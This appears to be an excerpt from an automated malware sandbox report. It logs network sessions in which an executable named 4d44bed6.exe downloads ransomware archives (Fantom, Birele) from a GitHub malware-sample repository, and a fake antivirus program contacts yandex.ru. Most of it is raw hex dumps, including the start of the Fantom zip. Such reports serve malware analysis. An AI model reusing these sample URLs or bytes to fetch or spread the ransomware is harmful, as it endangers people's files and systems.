                                                                                                                                                2022-09-29 12:52:40 UTC38408INData Raw: 6a 52 35 d1 8e e4 ab 1b e0 4c e2 5e 21 77 79 13 c6 01 94 cc d5 79 f8 8b 4a da d5 7c c9 f7 25 ff 7c 81 56 e7 68 60 fb cc e4 76 71 69 be 72 03 d9 fb cd 69 a5 dc 74 ae a8 97 17 b0 77 f7 18 85 54 b7 db fb 9b 55 e0 bc 20 d2 8e 30 87 5d 63 42 22 a2 6f 17 ab 6a 13 ef 69 30 18 46 37 01 5d 76 08 3e 59 fa 27 90 2b 66 e5 43 d1 aa cc 83 d0 2d 38 29 dc 78 a4 23 b1 79 f8 ae 7c 8a b0 63 18 c7 d4 a3 e2 d8 a9 68 cd 63 2c ab 8a 0f fd 79 ea e3 e5 e3 06 bf c6 f4 72 41 6b 17 e7 65 3c d4 7c c1 1e 52 be 48 e3 35 7c b7 5e 7c b2 9b 1b 2b 8e 22 ad 92 99 66 89 d3 12 80 b4 8b 3f d4 f2 c1 f1 e3 8e 4c 85 a3 32 8e a7 4a 62 7e 37 e9 14 12 d8 8b 10 63 bc 00 c1 5f 36 f2 f8 9c a6 e5 b0 e4 1d 8e fe d2 17 31 cf 6f 99 cc cf be 4f e6 30 ed e5 0d 6b bc b1 bb 12 f1 52 89 9a 9f 05 a1 1f f0 da 2e
                                                                                                                                                Data Ascii: jR5L^!wyyJ|%|Vh`vqiritwTU 0]cB"oji0F7]v>Y'+fC-8)x#y|chc,yrAke<|RH5|^|+"f?L2Jb~7c_61oO0kR.
                                                                                                                                                2022-09-29 12:52:40 UTC38424INData Raw: f8 f9 e8 4f e7 36 b0 55 32 38 31 a5 17 a7 d8 45 bc 06 28 bc b4 5f e5 ce aa 58 3f 31 0b 48 ca 07 70 fa fe 44 3c 11 ce e2 53 21 92 01 7e 17 42 46 d8 ac 49 a0 42 0d 4d a1 3d 45 c5 7e 0c 9a ba 4c d1 9f 16 1c 97 c6 75 90 e4 01 b7 f6 fe ff d6 fb 64 76 36 50 c2 40 3b fa 2e 26 64 ff 2d 2b b5 84 a7 39 7b b8 b4 a2 1c f5 7d a0 57 b0 d7 fe 7a c5 5e 2a 45 d0 f0 34 14 e6 de d2 be 76 ee 37 24 3b 03 c2 68 09 ba 78 b7 8a 46 b6 32 64 f9 7c b4 38 26 f6 12 5d e3 a7 61 84 85 dc f6 04 61 d7 2c a8 e5 2a f6 df 93 b0 61 9f e3 44 b3 28 f9 29 39 84 0c 64 7d 7f 0f 4c 20 62 f5 13 54 fe ec 15 06 26 0a 8a 06 f6 af 55 d9 d4 03 fd d5 a4 dd 6d 81 6a 4f a3 1c b3 dd 41 33 c0 5d 46 cb 36 d2 6d 68 39 d7 7e a8 38 04 7e 33 75 06 a1 50 83 36 d5 6f 28 8c b9 22 58 12 4e dc 97 ca 44 d9 61 7a 37 27
                                                                                                                                                Data Ascii: O6U281E(_X?1HpD<S!~BFIBM=E~Ludv6P@;.&d-+9{}Wz^*E4v7$;hxF2d|8&]aa,*aD()9d}L bT&UmjOA3]F6mh9~8~3uP6o("XNDaz7'
                                                                                                                                                2022-09-29 12:52:40 UTC38440INData Raw: 67 ff 00 3f 2f 78 26 0f cc 24 4e ab db d0 58 6d 23 9d 4f c0 aa ba 72 84 87 4d 31 6b 36 23 71 4c a3 c8 b8 2c 6b 2e 79 61 f6 97 68 dd 9e e2 ca b4 b6 eb fe 89 c6 9d 4e f5 4e ce 3d 15 1d 7a a7 16 e7 ad 9e dc 66 20 7c 96 d1 15 f6 cb 19 43 6a ea c8 b0 33 9b 14 ef 64 82 0e 5a 94 57 b3 8d 19 1c 3e 48 4d c9 5e 88 aa 8b 1d 96 d7 9a 40 ad 6c 95 ab a3 ce 3e b2 1d 00 9d 2b f4 3b 0b 0b bf 0a e4 8e 51 9d 31 65 d4 59 b5 27 aa 59 eb fe f7 71 cc 81 59 a1 9a d5 af f2 51 af 45 14 ab 68 46 ff 57 fa 15 b6 7d bf 27 20 f5 03 af c1 ba 9e e1 f6 e8 3f dd 7d 05 fe 08 e6 f9 33 b1 5e bc 37 17 18 0b 71 81 6f 37 de 8b 1a 6a f7 72 c8 4f 33 6e 4a cd 17 07 f3 dc 8a a1 bb 28 77 5b e4 de d2 9f af dd 0b 76 91 9b b8 e4 02 b4 f1 01 81 22 1a 1e ac 21 ee 8e e8 05 27 e6 5f 63 42 d8 f8 a5 9b 46 35
                                                                                                                                                Data Ascii: g?/x&$NXm#OrM1k6#qL,k.yahNN=zf |Cj3dZW>HM^@l>+;Q1eY'YqYQEhFW}' ?}3^7qo7jrO3nJ(w[v"!'_cBF5


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                71192.168.2.54980977.88.55.50443C:\Program Files (x86)\antiviruspc2009\avpc2009.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:53:04 UTC38450OUTGET /1001 HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Accept: */*
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                Host: yandex.ru
                                                                                                                                                Cookie: _yasc=jhOo48wDWFez3aA4ke/HoawdFErttzj/bx63BS9upmbL+J0m; is_gdpr_b=CPe0cBDfjAEYAQ==; is_gdpr=1
                                                                                                                                                2022-09-29 12:53:04 UTC38450INHTTP/1.1 404 Not Found
                                                                                                                                                Accept-CH: Viewport-Width, DPR, Device-Memory, RTT, Downlink, ECT
                                                                                                                                                Accept-CH-Lifetime: 31536000
                                                                                                                                                Cache-Control: no-cache,no-store,max-age=0,must-revalidate
                                                                                                                                                Connection: Close
                                                                                                                                                Content-Length: 17173
                                                                                                                                                Content-Security-Policy-Report-Only: connect-src https://*.mc.yandex.ru https://adstat.yandex.ru https://mc.admetrica.ru https://mc.yandex.ru https://yabs.yandex.ru https://yandex.ru;default-src 'none';frame-src https://*.ya.ru https://*.yandex.ru https://mc.yandex.md https://mc.yandex.ru https://ya.ru https://yandex.ru;img-src 'self' data: https://*.mc.yandex.ru https://*.verify.yandex.ru https://*.ya.ru https://*.yandex.ru https://adstat.yandex.ru https://avatars.mds.yandex.net https://favicon.yandex.net https://mc.admetrica.ru https://mc.yandex.com https://mc.yandex.ru https://ya.ru https://yabs.yandex.ru https://yandex.ru https://yastatic.net;report-uri https://csp.yandex.net/csp?project=morda&from=morda.intercept404.ru&showid=1664455984.48714.98712.77149&h=stable-morda-any-sas-yp-10&yandexuid=4335905451664455984;script-src 'unsafe-inline' https://*.mc.yandex.ru https://adstat.yandex.ru https://mc.yandex.ru https://yandex.ru https://yastatic.net;style-src 'unsafe-inline' https://yastatic.net
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:53:04 GMT
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:53:04 GMT
                                                                                                                                                Last-Modified: Thu, 29 Sep 2022 12:53:04 GMT
                                                                                                                                                NEL: {"report_to": "network-errors", "max_age": 100, "success_fraction": 0.001, "failure_fraction": 0.1}
                                                                                                                                                P3P: policyref="/w3c/p3p.xml", CP="NON DSP ADM DEV PSD IVDo OUR IND STP PHY PRE NAV UNI"
                                                                                                                                                Report-To: { "group": "network-errors", "max_age": 100, "endpoints": [{"url": "https://dr.yandex.net/nel", "priority": 1}, {"url": "https://dr2.yandex.net/nel", "priority": 2}]}
                                                                                                                                                Set-Cookie: i=1nAew5AiN63n5S2ILwQon5QYQQnolj0w5I6QSdywm2Mojf5CwhBU1IT3ZUzAGP4yCgVxSUeh6cmbytrNHdgk2OVcmWE=; Expires=Sat, 28-Sep-2024 12:53:04 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnly
                                                                                                                                                Vary: Cookie,Accept-Language,Accept-Encoding
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                2022-09-29 12:53:04 UTC38452INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 20 20 63 6c 61 73 73 3d 22 69 2d 75 61 5f 6a 73 5f 6e 6f 20 69 2d 75 61 5f 63 73 73 5f 73 74 61 6e 64 61 72 74 20 69 2d 75 61 5f 62 72 6f 77 73 65 72 5f 75 6e 6b 6e 6f 77 6e 20 69 2d 75 61 5f 62 72 6f 77 73 65 72 2d 65 6e 67 69 6e 65 5f 75 6e 6b 6e 6f 77 6e 20 69 2d 75 61 5f 62 72 6f 77 73 65 72 5f 64 65 73 6b 74 6f 70 20 69 2d 75 61 5f 70 6c 61 74 66 6f 72 6d 5f 77 69 6e 64 6f 77 73 22 20 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 20 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73
                                                                                                                                                Data Ascii: <!DOCTYPE html><html class="i-ua_js_no i-ua_css_standart i-ua_browser_unknown i-ua_browser-engine_unknown i-ua_browser_desktop i-ua_platform_windows" lang="ru"><head xmlns:og="http://ogp.me/ns#"><meta http-equiv='Content-Type' content='text/html;chars
                                                                                                                                                2022-09-29 12:53:04 UTC38459INData Raw: 75 6f 74 3b 75 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 2f 2f 79 61 6e 64 65 78 2e 72 75 2f 73 75 67 67 65 73 74 2f 73 75 67 67 65 73 74 2d 79 61 2e 63 67 69 3f 73 72 76 3d 6d 6f 72 64 61 5f 72 75 5f 64 65 73 6b 74 6f 70 26 61 6d 70 3b 77 69 7a 3d 54 72 57 74 68 26 61 6d 70 3b 75 69 6c 3d 72 75 26 61 6d 70 3b 66 61 63 74 3d 31 26 61 6d 70 3b 76 3d 34 26 61 6d 70 3b 69 63 6f 6e 3d 31 26 61 6d 70 3b 6c 72 3d 32 31 33 26 61 6d 70 3b 68 6c 3d 31 26 61 6d 70 3b 62 65 6d 6a 73 6f 6e 3d 30 26 61 6d 70 3b 68 74 6d 6c 3d 31 26 61 6d 70 3b 70 6c 61 74 66 6f 72 6d 3d 64 65 73 6b 74 6f 70 26 61 6d 70 3b 72 69 63 68 5f 6e 61 76 3d 31 26 61 6d 70 3b 73 68 6f 77 5f 65 78 70 65 72 69 6d 65 6e 74 3d 32 32 32 26 61 6d 70 3b 73 68 6f 77 5f 65 78 70 65 72 69 6d 65 6e 74
                                                                                                                                                Data Ascii: uot;url&quot;:&quot;//yandex.ru/suggest/suggest-ya.cgi?srv=morda_ru_desktop&amp;wiz=TrWth&amp;uil=ru&amp;fact=1&amp;v=4&amp;icon=1&amp;lr=213&amp;hl=1&amp;bemjson=0&amp;html=1&amp;platform=desktop&amp;rich_nav=1&amp;show_experiment=222&amp;show_experiment
                                                                                                                                                2022-09-29 12:53:04 UTC38463INData Raw: 70 61 6e 3e 3c 61 20 63 6c 61 73 73 3d 22 68 6f 6d 65 2d 6c 69 6e 6b 20 20 73 65 72 76 69 63 65 73 5f 5f 74 69 74 6c 65 2d 6c 69 6e 6b 20 68 6f 6d 65 2d 6c 69 6e 6b 5f 62 6c 75 65 5f 79 65 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 75 74 6f 2e 72 75 2f 3f 66 72 6f 6d 3d 6d 6f 72 64 61 26 75 74 6d 5f 73 6f 75 72 63 65 3d 79 61 6e 64 65 78 5f 6c 69 73 74 5f 73 65 72 76 69 63 65 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 63 70 6d 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 79 6c 73 5f 72 31 30 30 30 30 5f 74 69 74 6c 65 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 77 72 64 77 72 64 2d 31 36 33 33 34 5f 72 31 30 30 30 30 26 75 74 6d 5f 74 65 72 6d 3d 61 76 74 6f 6d 6f 62 69 6c 69 2d 73 2d 70 72 6f 62 65 67 6f 6d 5f 77 72 64 77 72 64 2d 31 36 33 33 34 22 20 64 61
                                                                                                                                                Data Ascii: pan><a class="home-link services__title-link home-link_blue_yes" href="https://auto.ru/?from=morda&utm_source=yandex_list_service&utm_medium=cpm&utm_campaign=yls_r10000_title&utm_content=wrdwrd-16334_r10000&utm_term=avtomobili-s-probegom_wrdwrd-16334" da


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                72192.168.2.549901140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:54:55 UTC38469OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2022-09-29 12:54:55 UTC38469INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:53:12 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Birele.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:54:55 UTC38470INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                8192.168.2.549708140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:18 UTC911OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Fantom.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:18 UTC912INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:15 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:18 UTC912INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                9192.168.2.549709185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:18 UTC914OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:18 UTC914INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 203087
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "0f6cd0c854741d82e79b6fae3ecfc41f9b92740bab354e2ee252955917725cf0"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 0846:E4BC:5E09CA:68A9EF:63359324
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:18 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6931-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455878.420093,VS0,VE1
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 3118f043abf12d64039c16c72e22ea3030f0790a
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:18 GMT
                                                                                                                                                Source-Age: 63
                                                                                                                                                2022-09-29 12:51:18 UTC915INData Raw: 50 4b 03 04 14 00 01 00 08 00 64 01 cd 4c 5a 74 a2 37 b5 18 03 00 00 16 04 00 0a 00 00 00 46 61 6e 74 6f 6d 2e 65 78 65 22 e7 f0 5b 88 6d 31 c8 1f 0b 7d 88 55 e3 33 f2 2a 91 e5 3a 5c 0e c4 5d 37 ee df 6e 5b a7 3d 5a a3 07 6d 88 45 a4 dc 8e 0a a0 0d 92 93 68 24 00 5c 40 19 4d 80 d5 9b c0 88 7e f4 e8 b1 12 2b e0 d8 eb 5f 40 26 3d 64 73 cf d8 7a 1d c8 74 62 56 d5 b5 6b bc c5 66 0c a3 c2 21 35 45 5c c6 a6 10 d6 9a 5f 61 cd b8 bd e2 41 ee 82 d1 88 dd bf 72 be cc b3 c5 72 36 49 19 d7 76 d2 2d 53 e4 de 95 e6 c9 b4 f0 49 f6 d6 ba f6 d0 5f a3 e9 83 90 3f 14 c4 e8 e9 a9 62 03 42 67 dc d3 0d 07 9f 7e 98 1e 50 4b b2 7a 2c 80 44 b5 9f 42 81 88 d5 88 42 ab ab 3c d2 27 98 7c df c6 d3 8e 82 7a 18 17 a0 bc c6 4a cf 60 40 eb 61 1b d0 ed 8e 15 2f 5e 30 68 c8 39 9a 73 d2 34
                                                                                                                                                Data Ascii: PKdLZt7Fantom.exe"[m1}U3*:\]7n[=ZmEh$\@M~+_@&=dsztbVkf!5E\_aArr6Iv-SI_?bBg~PKz,DBB<'|zJ`@a/^0h9s4
                                                                                                                                                2022-09-29 12:51:18 UTC931INData Raw: a2 90 f1 46 bd fa 58 76 14 cd 39 d7 85 92 02 85 20 c3 a5 98 83 22 ac 3c b8 93 ee 3f 06 5b 64 5f b0 0c eb e1 e3 a5 a6 2b 68 80 fb 5b 2f 0f 95 bb 70 e3 1d 8e 28 9b 78 6c ba 2d 60 71 44 86 6f 76 07 25 d1 ef eb 8c 2b 1d 4c c0 53 c8 17 82 29 49 06 eb c6 5d 2e 98 11 c9 d8 bc 0d 27 9a a0 13 b1 2a 77 e5 ae 3f 34 60 eb 84 cb fd 7b cd 9f 8c e6 3f 35 1d fc 80 ba ad 47 35 df 12 2b d5 d6 9b 0f d0 ba fd 51 2f 9a 54 d6 cc 3b 75 51 07 c2 4a 7f a1 b2 0a de da a0 b8 20 8f 36 4d 04 24 18 df 1f f0 d6 91 ee 78 45 5c e7 a1 17 e6 c1 bc 2f 3d 69 11 d8 2e fa 97 c2 c9 23 fb dd a1 75 52 9a fc bf 3d c5 a7 a1 74 56 d5 13 99 ec 6e 2d 44 fd a4 f8 9b 4a a1 ab 49 52 84 a0 09 01 cf 73 86 ef fb e7 17 2c b0 2f 55 4d 2e 15 ff 85 43 f4 16 6d 79 9b 3d 8a e5 3d 9e 75 7e 90 f8 0f 0e 8c f1 ac 61
                                                                                                                                                Data Ascii: FXv9 "<?[d_+h[/p(xl-`qDov%+LS)I].'*w?4`{?5G5+Q/T;uQJ 6M$xE\/=i.#uR=tVn-DJIRs,/UM.Cmy==u~a
                                                                                                                                                2022-09-29 12:51:18 UTC947INData Raw: 36 e4 b1 70 fd 30 bb 38 60 29 ff 0a 44 f9 e2 73 29 69 fb 52 3d ce da a5 e8 4c c0 f8 99 bd 9e 00 33 88 da b4 e2 01 07 5f de 97 88 36 37 86 35 bb 23 1f 45 31 0c 13 a1 2c 43 ec 79 4f d1 f9 4f ba 28 af 31 aa d6 c4 5b d4 62 dd 91 ed cc ff cd 8b 23 77 90 b4 9b b3 5a 2e c7 43 d1 2b b5 89 27 65 53 29 22 8f 00 36 0e a2 b0 5f 07 43 4b 16 8c 64 7a 49 d7 a5 17 89 89 cc 3f 61 f9 3a a9 cd 0a b0 4d ca c3 ad b5 f6 fd d0 18 08 85 c3 24 b2 29 bd 0d 73 1f 82 38 04 50 3e f3 a8 56 e9 ba 13 85 d3 3a a2 09 a8 b8 4c a3 16 be 50 b7 17 dc 34 b3 39 b0 61 b4 f2 ca cf fa 88 64 02 5e 36 7b f4 32 f7 02 93 5d 35 d7 35 74 36 2d 73 28 4c 2d 44 ec 80 0c 76 23 85 47 15 67 0a a7 6e 78 62 62 2e 0f fa 9e af de 4f 81 bb 14 f9 50 0e 98 d9 a8 54 2c 41 35 ad a5 70 54 f0 34 51 cc 3c 48 1f 2f 68 3d
                                                                                                                                                Data Ascii: 6p08`)Ds)iR=L3_675#E1,CyOO(1[b#wZ.C+'eS)"6_CKdzI?a:M$)s8P>V:LP49ad^6{2]55t6-s(L-Dv#Ggnxbb.OPT,A5pT4Q<H/h=
                                                                                                                                                2022-09-29 12:51:18 UTC963INData Raw: f7 ca 9f 68 9f 77 7a 4b b6 b8 bd 7a 98 56 4a b2 f5 fb 1b e3 6c 6c 54 3e 51 a7 92 47 0d e8 be dc 62 0d c9 14 fe 99 95 d5 2b ec da f5 08 0c 37 f2 bc 15 93 91 91 06 51 54 86 7c fa db 9c 66 45 3f 23 ec 33 7b b5 25 75 f8 f4 f8 3a 9d 91 88 90 9c 39 b5 16 e3 ce 06 76 64 23 08 a3 25 d2 c7 df 88 68 95 ca 69 a0 12 50 07 d2 6a 73 dc 01 f9 d1 54 b2 4d 12 7c 1d a5 69 ac e1 62 3a 2c 25 d7 b2 cc 23 dd 02 aa 9b d1 7a 02 a1 ea 77 bc ed 0d 7b ad 17 d7 88 63 59 5b 16 cd 41 66 0e 7d b5 56 ce 8e 6e ab 8d fd 0f 82 7e 25 2f 4d a4 53 1e 57 3f b6 f7 19 32 b7 27 43 58 4e 1b d6 ed 40 3d ec 89 fa d6 37 0a 6e 0b d7 1e 49 8f 0a 51 a2 20 67 c5 56 aa 6a cf fc b0 1c 60 d0 43 ab bc a6 d8 d7 83 7a 97 3a 04 74 bc cd 3c 18 c8 70 29 b1 62 fc 0f 2f ef 59 d6 04 28 81 db f5 b2 41 85 2d 3c 5c 9a
                                                                                                                                                Data Ascii: hwzKzVJllT>QGb+7QT|fE?#3{%u:9vd#%hiPjsTM|ib:,%#zw{cY[Af}Vn~%/MSW?2'CXN@=7nIQ gVj`Cz:t<p)b/Y(A-<\
                                                                                                                                                2022-09-29 12:51:18 UTC979INData Raw: b3 da c4 0b 4e 18 b8 c8 2b 82 33 11 8e 62 a0 80 88 7d 29 f1 94 3c b8 c5 d7 92 d3 99 4b d6 e8 38 7d f2 69 00 25 b7 79 48 07 f8 66 9e ad dd e8 65 39 74 62 37 4c 40 b6 03 26 55 92 56 40 3c 30 87 bd 26 fd c8 df 72 0b 76 5d e5 d7 14 af 68 25 58 71 1d 10 cd fa 13 01 d6 ad 31 e8 46 43 75 9b 4d cd f8 0f 07 bd 24 89 61 f4 c0 43 a7 b5 66 b4 0c a9 c9 2f 15 a1 c6 3e 76 01 c3 9a 76 48 37 20 5a f9 c3 6f d8 1d 6a 41 b5 b5 7e 5f 68 b3 c9 d5 c9 a3 8e d4 91 b0 2f 22 9e 6c 7f ea a5 94 ff 8d eb 41 68 9f 5d 21 37 e7 99 4e ee 29 04 88 4e 41 7e 7e a3 be 9c 27 7c 5e 5c 9c ba b5 91 03 5f 7c ef be b8 80 fd ae 0a 89 54 23 b9 2d 83 e8 05 88 ed 0d 58 fd 73 31 0b 4a a5 c6 91 9e 71 11 ee bd ec 3c 22 25 78 2d 03 93 b4 ae 20 3b 7c 4d ee 34 c8 b0 be f9 62 79 36 7b 14 ca a6 78 b6 e4 4f f2
                                                                                                                                                Data Ascii: N+3b})<K8}i%yHfe9tb7L@&UV@<0&rv]h%Xq1FCuM$aCf/>vvH7 ZojA~_h/"lAh]!7N)NA~~'|^\_|T#-Xs1Jq<"%x- ;|M4by6{xO
                                                                                                                                                2022-09-29 12:51:18 UTC995INData Raw: 61 4e c7 47 9e e5 9b 30 91 54 a4 85 b6 1f 92 57 cf c6 1d 2b 69 88 1d 52 bf 6d 4e 08 53 ef fb 76 d1 2c f2 9c 69 29 d4 7d 53 35 a0 b5 54 b2 6c 3c 50 13 f0 f3 8e 36 ec d1 85 20 82 99 a4 13 16 e8 e7 b0 af 35 80 b2 b5 85 e4 53 5c d2 1f ff 65 d3 19 50 29 d3 33 70 4e 2a 45 60 de 06 be 27 5b 83 76 d0 75 20 cd 41 9b 7b 41 6c a1 52 09 ff 01 97 f1 5e 76 50 54 73 0d 93 c9 49 a0 fd e4 57 3c 42 e8 b8 23 75 a0 69 68 e7 fd eb c5 d4 3b e9 30 f3 eb c8 25 d5 cf 1e 5a 24 77 83 5d d9 16 cf 2d c8 b0 45 ed 9a 4b e2 25 91 17 41 fb 75 98 b2 8c 30 a7 48 3f 25 c9 84 3f a3 54 4a a9 34 d5 7f a5 1b e3 0f c4 e2 a4 e3 07 4d 1b 5f 26 e3 34 c5 8e d2 b0 ba eb 13 dd 71 7e 15 b6 59 0b 74 93 82 fc 1a 98 33 e3 ed 9a 14 85 2b 1d 69 36 fb af 4d b0 11 00 89 bc 2e da fd b3 dc ae 14 9d 5b 6c 42 8c
                                                                                                                                                Data Ascii: aNG0TW+iRmNSv,i)}S5Tl<P6 5S\eP)3pN*E`'[vu A{AlR^vPTsIW<B#uih;0%Z$w]-EK%Au0H?%?TJ4M_&4q~Yt3+i6M.[lB
